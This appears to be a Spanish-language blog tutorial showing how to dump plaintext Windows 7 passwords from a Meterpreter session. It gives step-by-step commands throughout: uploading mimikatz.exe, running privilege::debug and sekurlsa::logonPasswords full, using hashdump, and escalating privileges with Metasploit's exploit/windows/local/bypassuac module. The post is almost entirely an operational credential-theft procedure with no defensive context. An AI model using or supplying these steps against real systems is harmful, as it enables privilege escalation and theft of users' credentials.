This page looks best with JavaScript enabled

Meterpreter + mimikatz y conociendo sobre Kiwi

 ·   ·   2 min read

Antes de todo como saben MimiKatz es una herramienta que aparecio hace un par de años atras la cual hizo el boom boom del momento ya que aprovechaba de Windows y sus puntos débiles para obtener credenciales en texto plano

A continuación tenemos algunas referencias adicionales de la herramienta que estoy seguro que les servira a mas de uno.

La entrada que nombramos es la siguiente una union con meterpreter.

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: Bash

  1. getsystem

o también

Código: Bash

  1. hashdump

pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:

Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32

ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload

lo siguiente es lanzar una shell

Código: Bash

  1. shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: Bash

  1. privilege::debug

  2. sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios

Para ello haremos uso de este exploit “exploit/windows/local/bypassuac”, pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: Bash

  1. background

Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: Bash

  1. use exploit/windows/local/bypassuac

  2. set SESSION 1

  3. exploit

Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: Bash

  1. sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

Código: Bash

  1. getuid

Finalmente lanzamos la shell y ejecutamos mimikatz.exe

Autor de la PoC: Typh0n

Regards,

Snifer

Share on
Support the author with

Avatar
WRITTEN BY